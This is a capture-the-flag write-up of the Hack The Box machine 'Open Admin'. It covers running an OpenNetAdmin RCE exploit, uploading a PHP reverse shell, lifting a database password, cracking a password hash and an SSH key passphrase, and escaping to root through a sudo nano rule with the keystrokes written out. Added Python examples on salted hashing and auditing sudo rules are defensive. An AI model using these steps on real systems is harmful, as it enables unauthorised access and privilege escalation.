Hack The Box: Open Admin


Enumeration

[screenshot]

The nmap scan reveals only two open ports: 22 (SSH) and 80, serving an Apache web server.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The website only shows a standard Apache welcome page, but after starting a gobuster scan, we get several hits for subdirectories. The first hit is music/, which leads to a kind of streaming page:

[screenshot]

and artwork/, which seems like a startup consulting service.

[screenshot]

Browsing the sites reveals that the pages are templates; most of the advertised services are front-end only. However, checking the target’s site map in Burp Suite shows something interesting:

[screenshot]

It seems that some files and data are hosted on the web server that should not be publicly available at all (such as Apache configuration files), and the ona/ directory leads to an OpenNetAdmin dashboard:

[screenshot]


Initial Foothold

We are already informed that the installed version is not the latest one. ExploitDB shows an RCE vulnerability for this exact version, so let’s try it… and it works!

❯ ./exploit.sh http://10.129.107.188/ona/
$ whoami
www-data
$ 

Then I uploaded a PHP reverse shell and got a netcat shell, which can be upgraded to a TTY with the help of Python. Then I started looking around for credentials and found something in the database settings:

<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

And with this password, we can log in as user jimmy.


Privilege Escalation

While looking around on the server, I had already noticed a directory /var/www/internal belonging to jimmy. Since jimmy’s home folder is empty and he also doesn’t have any sudo permissions, I started checking this directory. It contains three PHP files. The first one already gives a hit: a hashed password.

if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {

It seems that this password leads to joanna’s SSH keyfile:

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Next, I tried to access the page itself. netstat -tulpn revealed that it is listening on port 52846, which the Apache configuration confirms. Interestingly, the page is running as joanna.

Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

So let’s forward the port over SSH and access it from there.

$ ssh -L 52857:localhost:52846 jimmy@<ip>

[screenshot]

Then I got stuck, because I couldn’t crack the password with hashcat and the rockyou wordlist. However, I later noticed that it is also contained in the CrackStation database:

[screenshot]

An alternative way would have been to upload a webshell to the folder.
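The login check shown above compares an unsalted SHA-512 digest of the submitted password with a stored hex string, which is exactly why a precomputed lookup such as CrackStation can answer it: every user with that password gets the same digest, forever. The following Python example is added here and is not part of the box or of this writeup; it sets the weak scheme beside a salted, iterated, constant-time one. The function names (weak_digest, weak_verify, make_record, strong_verify) and the sample password are constructed for illustration.

```python
import hashlib
import hmac
import secrets


def weak_digest(password: str) -> str:
    """Unsalted SHA-512 hex digest, the scheme the login check above relies on."""
    return hashlib.sha512(password.encode()).hexdigest()


def weak_verify(stored_hex: str, candidate: str) -> bool:
    """Mirrors hash('sha512', $pw) == '...': a plain comparison of an unsalted digest.

    Two users with the same password share the same stored value, so one
    table lookup reveals both, and the digest can be precomputed offline.
    """
    return weak_digest(candidate) == stored_hex


def make_record(password: str, iterations: int = 210_000) -> str:
    """Hardened form: random per-user salt plus a slow KDF (PBKDF2-HMAC-SHA512).

    Record layout (constructed for this example): pbkdf2_sha512$<iters>$<salt hex>$<dk hex>
    """
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations)
    return f"pbkdf2_sha512${iterations}${salt.hex()}${dk.hex()}"


def strong_verify(record: str, candidate: str) -> bool:
    """Recompute the KDF with the stored salt and compare in constant time."""
    try:
        algo, iters, salt_hex, dk_hex = record.split("$")
    except ValueError:
        return False  # malformed record, never treat as a match
    if algo != "pbkdf2_sha512":
        return False
    dk = hashlib.pbkdf2_hmac("sha512", candidate.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    # hmac.compare_digest avoids leaking where the first differing byte is.
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def same_password_two_users(password: str, iterations: int = 210_000):
    """Show the difference for two accounts that chose the same password.

    Returns (weak digests identical?, hardened records identical?).
    """
    weak_same = weak_digest(password) == weak_digest(password)
    strong_same = make_record(password, iterations) == make_record(password, iterations)
    return weak_same, strong_same


if __name__ == "__main__":
    pw = "summer2019"  # constructed sample password, not one from the box
    print("weak digest:", weak_digest(pw))
    print("hardened record:", make_record(pw))
    print("two users, same password -> identical (weak, hardened):",
          same_password_two_users(pw))
```

The lookup that succeeded against the box would have been useless against the salted records, since the salt is chosen per user at the time the password is set; the iteration count additionally makes each guess cost a measurable amount of CPU.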


Privilege Escalation

Now that we have the key, we need to restrict its permissions (chmod 600) and crack its passphrase with ssh2john. This time the rockyou wordlist works and we can log in as user joanna.

The privilege escalation is very easy: sudo -l shows that joanna can execute the command /bin/nano /opt/priv with sudo, and with the help of GTFOBins we can use that to get root:

$ sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0
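A sudo rule that grants an interactive editor is root in all but name, as the nano escape above shows. The following Python audit script is an added example, not part of the box or of this writeup: it parses the rule section of sudo -l output and flags commands whose program is one GTFOBins documents as able to spawn a shell, as well as wildcard arguments and NOPASSWD tags. The sample output, the function names and the small SHELL_ESCAPE_BINS set are constructed for illustration; the nano rule mirrors the one from the writeup.

```python
import re
import shlex
from os.path import basename

# Hand-picked subset of programs that GTFOBins documents as able to
# spawn a shell or write arbitrary files when run under sudo.
# The box's /bin/nano is one of them; extend the set for your environment.
SHELL_ESCAPE_BINS = {
    "nano", "vim", "vi", "less", "more", "man", "find", "awk",
    "python", "python3", "perl", "env", "bash", "sh",
}

# "(runas) TAG: TAG: command args"  e.g. "(root) NOPASSWD: /usr/bin/id"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(output: str):
    """Return (runas, tags, command) tuples from the rule section of `sudo -l`."""
    rules = []
    in_rules = False
    for raw in output.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True      # everything after this header is a rule
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            rules.append((m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules


def audit_rule(runas: str, tags: set, cmd: str):
    """Return the list of reasons a rule is risky (empty list = nothing flagged)."""
    reasons = []
    if cmd == "ALL":
        return ["unrestricted command (ALL)"]
    argv = shlex.split(cmd)
    prog = basename(argv[0])
    if prog in SHELL_ESCAPE_BINS:
        reasons.append(f"{prog} can escape to a shell (see GTFOBins), so this is effectively root")
    if any("*" in a for a in argv[1:]):
        reasons.append("wildcard in arguments lets the caller choose the target")
    if "NOPASSWD" in tags:
        reasons.append("NOPASSWD: no password needed, so a stolen session is enough")
    return reasons


def audit_sudo_l(output: str):
    """Run audit_rule over every parsed rule; return [(command, reasons), ...] for flagged ones."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(output):
        reasons = audit_rule(runas, tags, cmd)
        if reasons:
            findings.append((cmd, reasons))
    return findings


# Constructed sample `sudo -l` output (not captured from the box).
SAMPLE = """\
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User joanna may run the following commands on openadmin:
    (ALL) /bin/nano /opt/priv
    (root) /usr/bin/id
    (root) NOPASSWD: /bin/cat /var/log/apache2/*.log
"""

if __name__ == "__main__":
    for cmd, reasons in audit_sudo_l(SAMPLE):
        print(cmd)
        for r in reasons:
            print("  -", r)
```

Feed it the real output with audit_sudo_l(subprocess.check_output(["sudo", "-l"], text=True)) on a host you administer; the fix for a flagged editor rule is to replace the editor with a purpose-built script (or sudoedit with a tightly scoped path) rather than to hand out nano.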